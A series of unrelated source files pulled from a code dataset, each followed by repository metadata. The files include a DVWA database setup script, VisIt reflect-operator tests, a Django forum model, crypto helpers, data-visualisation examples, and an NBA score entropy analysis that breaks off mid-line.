feed_dict={self.input_images: img1}) pred_score2 = self.sess.run([self.output_score], feed_dict={self.input_images: img2}) pred_score3 = self.sess.run([self.output_score], feed_dict={self.input_images: img3}) pred_score = pred_score+pred_score1+pred_score2+pred_score3 if pred_score is not None: pred_label = np.argmax(pred_score[0], axis=1)[0] result = {'result': self.label_id_name_dict[str(pred_label)]} else: result = {'result': 'predict score is None'} return result def _postprocess(self, data): return data
40.106145
109
0.528068
2f804b90261ea044b41c8b13aa8defc13023ddb9
791
py
Python
dvwa-app/victim/dvwa_init.py
alxgrk/pratikum-sec-inf-and-event-mgmt
a53d8a79be4664b7b8b249034760bab1d9fbc657
[ "Apache-2.0" ]
4
2019-05-13T21:39:29.000Z
2019-08-10T09:19:44.000Z
dvwa-app/victim/dvwa_init.py
alxgrk/pratikum-sec-inf-and-event-mgmt
a53d8a79be4664b7b8b249034760bab1d9fbc657
[ "Apache-2.0" ]
null
null
null
dvwa-app/victim/dvwa_init.py
alxgrk/pratikum-sec-inf-and-event-mgmt
a53d8a79be4664b7b8b249034760bab1d9fbc657
[ "Apache-2.0" ]
null
null
null
from time import sleep from selenium.webdriver.chrome.options import Options from selenium import webdriver from pyvirtualdisplay import Display import requests import os # dvwa init script - to create the dvwa database requests.packages.urllib3.disable_warnings() # Virtual display to run chrome-browser display = Display(visible=0, size=(800, 800)) display.start() chrome_options = Options() chrome_options.add_argument('--headless') chrome_options.add_argument('--no-sandbox') chrome_options.add_argument('--disable-dev-shm-usage') browser = webdriver.Chrome(chrome_options=chrome_options) # create DATABASE ### url = 'http://localhost/setup.php' browser.get(url) browser.find_element_by_name('create_db').click() # shut down browser.quit() display.popen.kill() os._exit(os.EX_OK)
24.71875
57
0.790139
2f8dc9b39b247781ae302d4a2415ef37a9e428aa
7,964
py
Python
src/test/tests/operators/reflect.py
visit-dav/vis
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
[ "BSD-3-Clause" ]
226
2018-12-29T01:13:49.000Z
2022-03-30T19:16:31.000Z
src/test/tests/operators/reflect.py
visit-dav/vis
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
[ "BSD-3-Clause" ]
5,100
2019-01-14T18:19:25.000Z
2022-03-31T23:08:36.000Z
src/test/tests/operators/reflect.py
visit-dav/vis
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
[ "BSD-3-Clause" ]
84
2019-01-24T17:41:50.000Z
2022-03-10T10:01:46.000Z
# ---------------------------------------------------------------------------- # CLASSES: nightly # # Test Case: reflect.py # # Tests: mesh - 3D curvilinear, single domain, # 3D rectilinear, single domain. # 3D unstructured, single domain. # plots - pc, vector, subset # # Defect ID: '5079, '5872, '6321 # # Programmer: Hank Childs # Date: June 24, 2004 # # Modifications: # # Hank Childs, Fri Aug 13 09:52:28 PDT 2004 # Test ghost nodes along the reflection plane. # # Hank Childs, Thu Aug 19 16:37:35 PDT 2004 # Do not test ops_refl12 since that is done in reflect2.py (and will be # until SR mode plays well with transparency). # # Jeremy Meredith, Thu Oct 21 11:56:05 PDT 2004 # Reintegrated ops_refl12 since SR/transparency works now. # # Hank Childs, Thu Jan 20 11:31:43 PST 2005 # Test projecting then reflecting ['5872]. # # Hank Childs, Tue Jul 5 09:29:40 PDT 2005 # Test that reflected plots are not degenerate by using the volume plot # ['6321]. # # Jeremy Meredith, Tue Jul 15 10:43:58 EDT 2008 # Changed number of vectors in vector plot to match the old behavior. # (We now account for how many domains there are.) # # Mark C. Miller, Wed Jan 20 07:37:11 PST 2010 # Added ability to swtich between Silo's HDF5 and PDB data. # # Cyrus Harrison, Thu Mar 25 09:57:34 PDT 2010 # Added call(s) to DrawPlots() b/c of changes to the default plot state # behavior when an operator is added. # # Kathleen Biagas, Mon Dec 19 15:45:38 PST 2016 # Use FilledBoundary plot for materials instead of Subset. # # Alister Maguire, Wed Apr 25 15:56:47 PDT 2018 # Added tests for reflecting across an arbitrary plane. # # ---------------------------------------------------------------------------- # 3D, rectilinear. Multi-block Tests ghost zones as well. OpenDatabase(silo_data_path("rect2d.silo")) atts = ReflectAttributes() AddPlot("Pseudocolor", "d") AddOperator("Reflect") atts.reflections = (1, 0, 1, 0, 0, 0, 0, 0) SetOperatorOptions(atts) DrawPlots() Test("ops_refl01") DeleteAllPlots() AddPlot("Mesh", "quadmesh2d") AddPlot("FilledBoundary", "mat1") SetActivePlots((0,1)) AddOperator("Reflect") DrawPlots() atts.reflections = (0, 1, 1, 1, 0, 0, 0, 0) atts.useXBoundary = 0 atts.specifiedX = -0.1 atts.useYBoundary = 0 atts.specifiedY = -0.05 SetOperatorOptions(atts) Test("ops_refl02") DeleteAllPlots() OpenDatabase(silo_data_path("curv2d.silo")) AddPlot("Pseudocolor", "d") AddOperator("Reflect") DrawPlots() Test("ops_refl03") AddOperator("Isosurface") DrawPlots() Test("ops_refl04") # Move the isosurface operator before the reflect. This tests whether # or not we can reflect polydata. PromoteOperator(0) DrawPlots() Test("ops_refl05") DeleteAllPlots() # Test unstructured mesh -- plus test vectors. OpenDatabase(silo_data_path("globe.silo")) AddPlot("Vector", "vel") v = VectorAttributes() v.vectorOrigin = v.Head v.nVectors = 400*4 SetPlotOptions(v) AddOperator("Reflect") atts.reflections = (1, 0, 1, 0, 1, 0, 0, 1) atts.useXBoundary = 1 atts.useYBoundary = 1 SetOperatorOptions(atts) DrawPlots() v = GetView3D() v.viewNormal = (-0.324974, 0.839345, 0.435765) v.focus = (-10, -10, -10) v.viewUp = (-0.252067, 0.367233, -0.895322) v.viewAngle = 30 v.parallelScale = 34.641 v.nearPlane = -69.282 v.farPlane = 69.282 v.imagePan = (0, 0) v.imageZoom = 1.56244 v.perspective = 1 v.eyeAngle = 2 v.centerOfRotationSet = 0 v.centerOfRotation = (0, 0, 0) SetView3D(v) Test("ops_refl06") # Now test a zonal vector variable (different code in the reflect operator). ChangeActivePlotsVar("disp") Test("ops_refl07") disp_atts = DisplaceAttributes() disp_atts.variable = "vel" SetDefaultOperatorOptions(disp_atts) AddOperator("Displace") DrawPlots() Test("ops_refl08") PromoteOperator(0) disp_atts.variable = "disp" disp_atts.factor = 4 SetOperatorOptions(disp_atts) ChangeActivePlotsVar("vel") DrawPlots() Test("ops_refl09") DeleteAllPlots() # Test that we properly put ghost nodes along the reflection plane. # There is a lot of code dedicated to creating the ghost nodes for a # rectilinear grid. Use the PXPYPZ and NXNYNZ octants to flex all of that # code. OpenDatabase(silo_data_path("noise.silo")) AddPlot("Pseudocolor", "hardyglobal") pc = PseudocolorAttributes() pc.SetOpacityType(pc.Constant) pc.opacity = 0.3 SetPlotOptions(pc) AddOperator("Reflect") r = ReflectAttributes() r.reflections = (1,1,1,1,1,1,1,1) SetOperatorOptions(r) DrawPlots() v = GetView3D() v.viewNormal = (-0.390471, 0.546441, 0.740901) v.focus = (-10, -10, -10) v.viewUp = (0.00925777, 0.807079, -0.590371) v.viewAngle = 30 v.parallelScale = 34.641 v.nearPlane = -69.282 v.farPlane = 69.282 v.imagePan = (0, 0) v.imageZoom = 1 v.perspective = 1 v.eyeAngle = 2 v.centerOfRotationSet = 0 v.centerOfRotation = (0, 0, 0) SetView3D(v) Test("ops_refl10") r.octant = r.NXNYNZ SetOperatorOptions(r) v.viewNormal = (0.576101, 0.343493, 0.741701) v.focus = (10, 10, 10) v.viewUp = (-0.15522, 0.936877, -0.313318) SetView3D(v) Test("ops_refl11") # Now make sure that this works well with an everyday vtkPointSet as well. # Also test that we can handle the presence of both ghost nodes (from the # reflect) and ghost zones (from the multi_ucd3d file). DeleteAllPlots() OpenDatabase(silo_data_path("multi_ucd3d.silo")) AddPlot("Pseudocolor", "d") SetPlotOptions(pc) AddOperator("Reflect") r = ReflectAttributes() r.reflections = (1,0,0,0,1,0,0,0) SetOperatorOptions(r) DrawPlots() v.viewNormal = (0.328912, 0.896692, 0.296244) v.focus = (0, 2.5, 20) v.viewUp = (-0.710536, 0.441617, -0.547826) v.viewAngle = 30 v.parallelScale = 20.7666 v.nearPlane = -41.5331 v.farPlane = 41.5331 v.imagePan = (-0.237006, -0.229008) v.imageZoom = 1.25605 v.perspective = 1 v.eyeAngle = 2 v.centerOfRotationSet = 0 v.centerOfRotation = (0, 0, 0) SetView3D(v) Test("ops_refl12") DeleteAllPlots() OpenDatabase(silo_data_path("globe.silo")) AddPlot("Boundary", "mat1") AddOperator("Project") AddOperator("Reflect") DrawPlots() Test("ops_refl13") # The "mass volume extractor" of the volume renderer depends on the # rectilinear grid not being inverted. Test that here ('6321). DeleteAllPlots() OpenDatabase(silo_data_path("rect3d.silo")) AddPlot("Volume", "d") AddOperator("Reflect") DrawPlots() Test("ops_refl14") # # Now test reflecting different datasets over arbitrary planes. # # Test 3D rectilinear over arbitrary plane. DeleteAllPlots() OpenDatabase(silo_data_path("multi_rect3d.silo")) AddPlot("Pseudocolor" ,"d") AddOperator("Reflect") atts = ReflectAttributes() atts.reflectType = atts.Plane atts.planePoint = (1, 1, 1) atts.planeNormal = (4, 5, 6) SetOperatorOptions(atts) DrawPlots() Test("arb_plane00") # Test 3D curvilinear over arbitrary plane. DeleteAllPlots() ResetView() OpenDatabase(silo_data_path("curv3d.silo")) AddPlot("Pseudocolor" ,"v") AddOperator("Reflect") atts = ReflectAttributes() atts.reflectType = atts.Plane atts.planePoint = (-8, -3, -4) atts.planeNormal = (4.5, 3, 2) SetOperatorOptions(atts) DrawPlots() Test("arb_plane01") # Test 2D curvilinear DeleteAllPlots() OpenDatabase(silo_data_path("curv2d.silo")) AddPlot("Pseudocolor" ,"v") AddOperator("Reflect") atts = ReflectAttributes() atts.reflectType = atts.Plane atts.planePoint = (-8, -3, 0) atts.planeNormal = (4.5, 3, 0) SetOperatorOptions(atts) DrawPlots() Test("arb_plane02") # Test 3D unstructured DeleteAllPlots() OpenDatabase(silo_data_path("globe.silo")) AddPlot("Pseudocolor" ,"v") AddOperator("Reflect") atts = ReflectAttributes() atts.reflectType = atts.Plane atts.planePoint = (-8, -3, 0) atts.planeNormal = (7, 9, 1) SetOperatorOptions(atts) DrawPlots() Test("arb_plane03") AddOperator("Reflect") atts = ReflectAttributes() atts.reflectType = atts.Plane atts.planePoint = (20, 15, 19) atts.planeNormal = (3, 2, 4) SetOperatorOptions(atts) DrawPlots() Test("arb_plane04") Exit()
23.218659
78
0.701783
85ecb0843554ba21bdfb959674c3a245209a1a46
936
py
Python
gratz/forum/models.py
mike-carter/Gratz
5f0889c4ad127e2bb513f11cb4b39e9a3aa2d4c6
[ "MIT" ]
null
null
null
gratz/forum/models.py
mike-carter/Gratz
5f0889c4ad127e2bb513f11cb4b39e9a3aa2d4c6
[ "MIT" ]
null
null
null
gratz/forum/models.py
mike-carter/Gratz
5f0889c4ad127e2bb513f11cb4b39e9a3aa2d4c6
[ "MIT" ]
null
null
null
from django.db import models from django.contrib.auth.models import User from django.urls import reverse # Create your models here. class Post(models.Model): owner = models.ForeignKey(User, on_delete=models.SET_NULL, null=True) title = models.CharField(max_length=200) date_posted = models.DateTimeField('date posted') text = models.TextField(null=True) def get_post_summary(self): summary = self.text[:141] if len(self.text) > 140: summary += '...' return summary def get_absolute_url(self): return reverse('forum:post_detail', kwargs={'pk': self.pk}) def __str__(self): return self.title class Comment(models.Model): post = models.ForeignKey(Post, on_delete=models.CASCADE) owner = models.ForeignKey(User, on_delete=models.SET_NULL, null=True) date_posted = models.DateTimeField('date posted') text = models.TextField(null=True)
28.363636
73
0.692308
7b362861b251d9ca35fbc4b47058e09adae518d8
430
py
Python
exercises/es/solution_01_03_02.py
Jette16/spacy-course
32df0c8f6192de6c9daba89740a28c0537e4d6a0
[ "MIT" ]
2,085
2019-04-17T13:10:40.000Z
2022-03-30T21:51:46.000Z
exercises/es/solution_01_03_02.py
Jette16/spacy-course
32df0c8f6192de6c9daba89740a28c0537e4d6a0
[ "MIT" ]
79
2019-04-18T14:42:55.000Z
2022-03-07T08:15:43.000Z
exercises/es/solution_01_03_02.py
Jette16/spacy-course
32df0c8f6192de6c9daba89740a28c0537e4d6a0
[ "MIT" ]
361
2019-04-17T13:34:32.000Z
2022-03-28T04:42:45.000Z
# Importa la clase de lenguaje "Spanish" y crea el objeto nlp from spacy.lang.es import Spanish nlp = Spanish() # Procesa el texto doc = nlp("Me gustan las panteras negras y los leones.") # Un slice del Doc para "panteras negras" panteras_negras = doc[3:5] print(panteras_negras.text) # Un slice del Doc para "panteras negras y los leones" (sin el ".") panteras_negras_y_leones = doc[3:8] print(panteras_negras_y_leones.text)
26.875
67
0.751163
cda61c3e1040bdcce1d3d3b499178b6b51b69299
410
py
Python
src/pgsql_cluster.py
magistersart/ZTC_fork
ce72734ea575d9846b5b81f3efbfd14fa1f7e532
[ "PostgreSQL" ]
null
null
null
src/pgsql_cluster.py
magistersart/ZTC_fork
ce72734ea575d9846b5b81f3efbfd14fa1f7e532
[ "PostgreSQL" ]
null
null
null
src/pgsql_cluster.py
magistersart/ZTC_fork
ce72734ea575d9846b5b81f3efbfd14fa1f7e532
[ "PostgreSQL" ]
null
null
null
#!/usr/bin/python # pylint: disable=W0142 ''' Postgresql script for ztc (pgsql.* items) Copyright (c) 2009-2011 Vladimir Rusinov <[email protected]> Licensed under GNU GPL v.3 Currently supported metrics: * autovac_freeze (float) - returns max % of how close each database to autovac_freeze ''' from ztc.pgsql.pgcluster import PgCluster p = PgCluster() m = p.args[0] p.get(m, *p.args[1:])
22.777778
74
0.714634
cde4c068e03549736e09b71a3003913bfd1f84c3
619
py
Python
quark_core_api/common/object_initializers.py
arcticle/Quark
17aa5b5869a9e9c7a04c1a371fef5998f33dc319
[ "MIT" ]
null
null
null
quark_core_api/common/object_initializers.py
arcticle/Quark
17aa5b5869a9e9c7a04c1a371fef5998f33dc319
[ "MIT" ]
null
null
null
quark_core_api/common/object_initializers.py
arcticle/Quark
17aa5b5869a9e9c7a04c1a371fef5998f33dc319
[ "MIT" ]
null
null
null
APPLICATION = { "workspaces" : [{"id":1, "name":"WS-1", "dir":"d:/quark/WS-1"}, {"id":2, "name":"WS-2", "dir":"d:/quark/WS-2"}, {"id":3, "name":"WS-3", "dir":"d:/quark/WS-3"}], "user": { "name" : "John Doe", "email" : "[email protected]" }, "repo_limit" : 10, "tags" : [ "Data Analytics 101", "Artificial Intelligence", "Arcticle", "Quark" ], "scores" : [100, 200, 300, 400] } WORKSPACE = { "scripts" : [], "experiments" : [] } EXPERIMENT = { "pipeline" : [], "params" : {} }
17.685714
68
0.408724
a83765db97f22b3b2f20187788369f18856e68f4
1,139
py
Python
etl/transforms/primitives/df/tests/test_format_data.py
cloud-cds/cds-stack
d68a1654d4f604369a071f784cdb5c42fc855d6e
[ "Apache-2.0" ]
6
2018-06-27T00:09:55.000Z
2019-03-07T14:06:53.000Z
etl/transforms/primitives/df/tests/test_format_data.py
cloud-cds/cds-stack
d68a1654d4f604369a071f784cdb5c42fc855d6e
[ "Apache-2.0" ]
3
2021-03-31T18:37:46.000Z
2021-06-01T21:49:41.000Z
etl/transforms/primitives/df/tests/test_format_data.py
cloud-cds/cds-stack
d68a1654d4f604369a071f784cdb5c42fc855d6e
[ "Apache-2.0" ]
3
2020-01-24T16:40:49.000Z
2021-09-30T02:28:55.000Z
from etl.transforms.primitives.df import format_data from etl.core import test_utils import pytest import pandas as pd import numpy as np def test_format_columns(): df = pd.DataFrame([ { 'admittime': '5:43pm March 6th, 2012', 'age': 123, }, { 'admittime': '17:43 2012/3/6', 'age': 12.30, }, { 'admittime': '03-06-2012 5:43:00PM', 'age': '12', } ]) result = format_data.format_tsp(df, 'admittime') result = format_data.format_numeric(df, 'age') assert set(result.admittime) == set(['2012-03-06 17:43:00 EST']) assert list(result.age) == [123.0, 12.3, 12.0] @pytest.mark.parametrize('value, is_empty', [ ('', True), (' ', True), (' ', True), ("", True), (" ", True), (None, True), (np.nan, True), (0, False), ("abc", False), (123, False), (123.02, False), ]) def test_filter_out_empty(value, is_empty): df = pd.DataFrame([{'A': value, 'B': 'extra'}]) result = format_data.filter_empty_values(df.copy(), 'A') if is_empty: assert result.empty else: assert not result.empty
22.78
66
0.565408
8d0fc53c3e9dc97a8f7f4d71dcfa1ffec1d144b4
1,986
py
Python
imageDelta/experiment-epi-NaCl.py
swharden/ROI-Analysis-Pipeline
e83d96c43fdd50cb44be365289e964576492617e
[ "MIT" ]
4
2017-06-20T19:56:22.000Z
2021-05-29T10:07:47.000Z
imageDelta/experiment-epi-NaCl.py
swharden/ROI-Analysis-Pipeline
e83d96c43fdd50cb44be365289e964576492617e
[ "MIT" ]
11
2017-05-31T19:14:32.000Z
2018-09-12T23:44:11.000Z
imageDelta/experiment-epi-NaCl.py
swharden/ROI-Analysis-Pipeline
e83d96c43fdd50cb44be365289e964576492617e
[ "MIT" ]
2
2017-06-20T17:14:38.000Z
2017-06-20T19:51:34.000Z
""" Code in this file aims to automatically produce "difference images" from full frame micrographs of calcium-sensitive fluorophores before and after a drug is applied. This is done by creating a baseline image (the average of several TIFs before the drug) and calculating the difference between that and the average image of the drug exposure. The difference is color-coded where no change is white, decrease in brightness is blue, an dincrease in brightness is red. """ import os import imageDelta as id if __name__ == "__main__": ### CUSTOM ANALYSIS ### # This sample analysis routine analyzes all experiments where drugs were applied at the same time. # To create a new experiment, re-write this portion of the code. # given a list of experiment folders, analyze only those with NaCl in the filename folderRoot = R"X:\Data\AT1-Cre\MPO GCaMP6f\data\data-epi" folders = sorted(os.listdir(folderRoot)) folders = [x for x in folders if "-NaCl" in x] folders = [os.path.join(folderRoot, x) for x in folders] # ensure experiment folders contain properly-formatted filenames for folder in folders: folderPath = os.path.join(folder,"video") id.ensureImageFilenamesAreNumbers(folderPath) # analyze each experiment folder for folder in folders: if os.path.exists(folder+"/analysis_01_intensityOverTime.png"): print("Skipping already-analyzed folder:", os.path.basename(folder)) continue folderPath = os.path.join(folder,"video") if not os.path.exists(folderPath): print("Skipping path without a video folder:", os.path.basename(folder)) continue print(f"\n\nANALYZING: {folderPath}") drugs = [] drugs.append(id.Drug("NaCl", id.drugFrameFromFileList(10, folderPath))) drugs.append(id.Drug("AngII", id.drugFrameFromFileList(20, folderPath))) id.graphDrugExperiment(drugs, folderPath) print("DONE")
44.133333
102
0.704935
5705496f01ae32cfe1686c1207fb649cb14c3efc
1,434
py
Python
src/doc/data_into_visit/data_examples/blueprint_example.py
visit-dav/vis
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
[ "BSD-3-Clause" ]
226
2018-12-29T01:13:49.000Z
2022-03-30T19:16:31.000Z
src/doc/data_into_visit/data_examples/blueprint_example.py
visit-dav/vis
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
[ "BSD-3-Clause" ]
5,100
2019-01-14T18:19:25.000Z
2022-03-31T23:08:36.000Z
src/doc/data_into_visit/data_examples/blueprint_example.py
visit-dav/vis
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
[ "BSD-3-Clause" ]
84
2019-01-24T17:41:50.000Z
2022-03-10T10:01:46.000Z
import sys sys.path.append("/usr/gapps/conduit/software/ascent/0.7.1/toss_3_x86_64_ib/openmp/gnu/conduit-install/lib/python3.7/site-packages") import conduit import conduit.relay.io import conduit.blueprint.mesh import numpy mesh = conduit.Node() # Create the coordinate set. mesh["coordsets/coords/type"] = "uniform" mesh["coordsets/coords/dims/i"] = 3 mesh["coordsets/coords/dims/j"] = 3 mesh["coordsets/coords/origin/x"] = -10.0 mesh["coordsets/coords/origin/y"] = -10.0 mesh["coordsets/coords/spacing/dx"] = 10.0 mesh["coordsets/coords/spacing/dy"] = 10.0 # Add the topology. mesh["topologies/topo/type"] = "uniform" mesh["topologies/topo/coordset"] = "coords" # Add a simple element-associated field. mesh["fields/ele_example/association"] = "element" mesh["fields/ele_example/topology"] = "topo" edata = numpy.array([1, 2, 3, 4], dtype=numpy.float64) mesh["fields/ele_example/values"] = edata # Add a simple vertex-associated field. mesh["fields/vert_example/association"] = "vertex" mesh["fields/vert_example/topology"] = "topo" vdata = numpy.array([1, 1, 1, 2, 2, 2, 3, 3, 3], dtype=numpy.float64) mesh["fields/vert_example/values"] = vdata # Verify that the mesh conforms to the specification. verify_info = conduit.Node() if not conduit.blueprint.mesh.verify(mesh, verify_info): print("Verify failed") print(verify_info) print(mesh) conduit.relay.io.blueprint.write_mesh(mesh, "blueprint_example", "json")
31.173913
131
0.738494
57515b3f6fac81f089ab42897f38a8955772ed34
38
py
Python
sentinel/__init__.py
allagog0x01/sentwg
52285ecf2b03c30a78901a29a7af96c8ab5764c8
[ "Apache-2.0" ]
342
2017-08-21T20:12:56.000Z
2022-03-19T17:58:25.000Z
sentinel/__init__.py
allagog0x01/sentwg
52285ecf2b03c30a78901a29a7af96c8ab5764c8
[ "Apache-2.0" ]
57
2017-11-13T11:16:47.000Z
2022-03-01T13:54:31.000Z
vpn-node-cosmos/sentinel/__init__.py
smtcrms/sentinel
ff65bc9200f6c940aa184c0ec0872fdcfef25363
[ "MIT" ]
72
2017-11-23T05:13:24.000Z
2022-02-25T14:18:33.000Z
# coding=utf-8 from .node import node
12.666667
22
0.736842
5ff5c14b8287d95cc19e53bc26fd2e6fd47f2754
2,023
py
Python
_Dist/NeuralNetworks/c_BasicNN/DistNN.py
leoatchina/MachineLearning
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
[ "MIT" ]
1,107
2016-09-21T02:18:36.000Z
2022-03-29T02:52:12.000Z
_Dist/NeuralNetworks/c_BasicNN/DistNN.py
leoatchina/MachineLearning
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
[ "MIT" ]
18
2016-12-22T10:24:47.000Z
2022-03-11T23:18:43.000Z
_Dist/NeuralNetworks/c_BasicNN/DistNN.py
leoatchina/MachineLearning
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
[ "MIT" ]
776
2016-12-21T12:08:08.000Z
2022-03-21T06:12:08.000Z
import os import sys root_path = os.path.abspath("../../../") if root_path not in sys.path: sys.path.append(root_path) from _Dist.NeuralNetworks.NNUtil import * from _Dist.NeuralNetworks.DistBase import Base class Basic(Base): signature = "Basic" def __init__(self, *args, **kwargs): super(Basic, self).__init__(*args, **kwargs) self._name_appendix = "BasicNN" self.activations = self.hidden_units = None @property def name(self): return "NN" if self._name is None else self._name def init_model_param_settings(self): super(Basic, self).init_model_param_settings() self.activations = self.model_param_settings.get("activations", "relu") def init_model_structure_settings(self): super(Basic, self).init_model_structure_settings() self.hidden_units = self.model_structure_settings.get("hidden_units", [256, 256]) def _build_layer(self, i, net): activation = self.activations[i] if activation is not None: net = getattr(Activations, activation)(net, "{}{}".format(activation, i)) return net def _build_model(self, net=None): self._model_built = True if net is None: net = self._tfx current_dimension = net.shape[1].value if self.activations is None: self.activations = [None] * len(self.hidden_units) elif isinstance(self.activations, str): self.activations = [self.activations] * len(self.hidden_units) else: self.activations = self.activations for i, n_unit in enumerate(self.hidden_units): net = self._fully_connected_linear(net, [current_dimension, n_unit], i) net = self._build_layer(i, net) current_dimension = n_unit appendix = "_final_projection" fc_shape = self.hidden_units[-1] if self.hidden_units else current_dimension self._output = self._fully_connected_linear(net, [fc_shape, self.n_class], appendix)
36.781818
92
0.660405
7bffbb2958f7221f1f5a0f33b82cc40d76056662
1,333
py
Python
sFTP-master/crypto.py
Zusyaku/Termux-And-Lali-Linux-V2
b1a1b0841d22d4bf2cc7932b72716d55f070871e
[ "Apache-2.0" ]
9
2018-09-01T06:34:52.000Z
2020-11-02T22:53:58.000Z
sFTP-master/crypto.py
Zusyaku/Termux-And-Lali-Linux-V2
b1a1b0841d22d4bf2cc7932b72716d55f070871e
[ "Apache-2.0" ]
null
null
null
sFTP-master/crypto.py
Zusyaku/Termux-And-Lali-Linux-V2
b1a1b0841d22d4bf2cc7932b72716d55f070871e
[ "Apache-2.0" ]
5
2018-11-29T20:09:20.000Z
2020-11-02T22:54:00.000Z
# Date: 06/02/2018 # Author: Pure-L0G1C # Description: Encryption/Decryption from Crypto.PublicKey import RSA from base64 import b64encode, b64decode from Crypto.Random import get_random_bytes from Crypto.Cipher import Salsa20, PKCS1_OAEP class CryptoRSA(object): @staticmethod def generate_keys(): key = RSA.generate(4096) private_key = key.export_key() public_key = key.publickey().export_key() return public_key, private_key @staticmethod def encrypt(rec_publ_key, data): recipient_key = RSA.import_key(rec_publ_key) cipher_rsa = PKCS1_OAEP.new(recipient_key) return cipher_rsa.encrypt(data) @staticmethod def decrypt(priv_key, data): key = RSA.import_key(priv_key) cipher_rsa = PKCS1_OAEP.new(key) return cipher_rsa.decrypt(data) class CryptoSalsa20(object): @staticmethod def generate_key(): return get_random_bytes(32) @classmethod def encrypt(cls, data, key=None): key = cls.generate_key() if not key else key cipher = Salsa20.new(key=key) return b64encode(cipher.encrypt(data)), b64encode(key), b64encode(cipher.nonce) @staticmethod def decrypt(ciphertext, key, nonce): ciphertext, key, nonce = [b64decode(_) for _ in [ciphertext, key, nonce]] cipher = Salsa20.new(key=key, nonce=nonce) return cipher.decrypt(ciphertext)
27.770833
82
0.733683
d0a500b2a07db8ae743eec79ff0d8f00f3aac617
6,731
py
Python
test/demonst_4_nba.py
saeyoung/tslb
5f52646260e14f44c61a670cfc75509951e5e794
[ "MIT" ]
null
null
null
test/demonst_4_nba.py
saeyoung/tslb
5f52646260e14f44c61a670cfc75509951e5e794
[ "MIT" ]
3
2020-03-24T18:18:21.000Z
2021-08-23T20:37:09.000Z
test/demonst_4_nba.py
saeyoung/tslb
5f52646260e14f44c61a670cfc75509951e5e794
[ "MIT" ]
null
null
null
############################################################# # # Real-world Data 4. NBA # ############################################################# import sys, os sys.path.append("../..") sys.path.append("..") sys.path.append(os.getcwd()) import numpy as np import pandas as pd import copy import pickle from math import log, e from sklearn.linear_model import LinearRegression from numpy.linalg import eig from tslb.src.lzw import * from tslb.src.utils import * from tslb.src.regModel import regModel as regModel def get_first_diff(seq): return (seq.shift(-1) - seq).values[:-1].astype(int) def get_year(df, yr=213): return df[(df.nbaId > yr*100000) & (df.nbaId < (yr+1)*100000)] def get_matrix(df, fr='5S'): df_int = df.copy() df_int = df_int[df_int.TIME_INT.shift(-1) != df_int.TIME_INT] # remove the rows with the same TIME_INT ### Create Matrix only with Q1-Q4 # 1230 rows : 1230 games in total # 193 columns : 48 mins (4 Quarters) / 15 secs interval # only quarter 4 df_q4 = df_int[df_int.TIME_INT <= pd.to_timedelta("00:48:00")] df_q4.loc[:,'TIME_INT'] = pd.to_datetime(df_q4.loc[:,'TIME_INT']) # time_index = pd.timedelta_range(start = pd.to_timedelta("00:00:00"), end = pd.to_timedelta("00:48:00"), freq='15s') df_q4_home = pd.pivot_table(df_q4, values='HOME_SCORE', columns=['nbaId'],index=['TIME_INT']) df_q4_home = df_q4_home.fillna(method = 'ffill') df_q4_home = df_q4_home.asfreq(freq=fr, method='ffill') df_q4_away = pd.pivot_table(df_q4, values='AWAY_SCORE', columns=['nbaId'],index=['TIME_INT']) df_q4_away = df_q4_away.fillna(method = 'ffill') df_q4_away = df_q4_away.asfreq(freq=fr, method='ffill') df_q4_home = df_q4_home.T df_q4_away = df_q4_away.T return df_q4_home, df_q4_away def import_data(fr = '15S', yr = 214): df = pd.read_pickle("../data/nba_scores_2103-2018.pkl") df_q4_home, df_q4_away = get_matrix(get_year(df, yr=yr), fr=fr) df_q4 = pd.concat([df_q4_home, df_q4_away]) return df_q4 def plot_data(): df_q4 = import_data(fr = '15S', yr = 214) score = df_q4.iloc[0,:] plt.title("NBA game score") plt.plot(score.values) plt.xlabel("time") plt.ylabel("score") plt.savefig("result/nba_score.pdf", format='pdf') plt.show() plt.title("NBA game score difference (15s interval)") plt.scatter(range(len(get_first_diff(score))),get_first_diff(score)) plt.xlabel("time") plt.ylabel("score") plt.savefig("result/nba_score_diff.pdf", format='pdf') plt.show() def year_test(df, fr = '15S', yr = 213): ##### df_q4_home, df_q4_away = get_matrix(get_year(df, yr=yr), fr=fr) samples = 100 size = df_q4_home.shape[1]-1 myRegModel3 = regModel(3, size, samples) myRegModel4 = regModel(4, size, samples) myRegModel5 = regModel(5, size, samples) myRegModel6 = regModel(6, size, samples) myRegModel7 = regModel(7, size, samples) myRegModel3.fit(plot=False) myRegModel4.fit(plot=False) myRegModel5.fit(plot=False) myRegModel6.fit(plot=False) myRegModel7.fit(plot=False) lbs_home=[] for i in range(df_q4_home.shape[0]): seq = df_q4_home.astype(int).iloc[i] uncomp_numbers = get_first_diff(seq) n = max(uncomp_numbers)+1 print(n) if n==3: myRegModel = myRegModel3 elif n==4: myRegModel = myRegModel4 elif n==5: myRegModel = myRegModel5 elif n==6: myRegModel = myRegModel6 elif n==7: myRegModel = myRegModel7 if np.sum(uncomp_numbers <0) !=0: continue ratio = lzw_compression_ratio(uncomp_numbers, n) ent = myRegModel.get_entropy(ratio, "a multinomial sequence", False) lb = h_inverse(ent, n, a=0.001) lbs_home.append(lb) lbs_away=[] for i in range(df_q4_away.shape[0]): seq = df_q4_away.astype(int).iloc[i] uncomp_numbers = get_first_diff(seq) n = max(uncomp_numbers)+1 print(n) if n==3: myRegModel = myRegModel3 elif n==4: myRegModel = myRegModel4 elif n==5: myRegModel = myRegModel5 elif n==6: myRegModel = myRegModel6 elif n==7: myRegModel = myRegModel7 if np.sum(uncomp_numbers <0) !=0: continue ratio = lzw_compression_ratio(uncomp_numbers, n) ent = myRegModel.get_entropy(ratio, "a multinomial sequence", False) lb = h_inverse(ent, n, a=0.001) lbs_away.append(lb) lbs = np.append(np.array(lbs_home), np.array(lbs_away)) lbs_df = pd.DataFrame(lbs, columns=[yr]) return lbs_df def save_data(): df = pd.read_pickle("../data/nba_scores_2103-2018.pkl") lbs_df_all = pd.DataFrame() for yr in [213,214,215,216,217,218]: # for yr in [213,214]: lbs_df = year_test(df, fr = '15S', yr = yr) lbs_df_all = 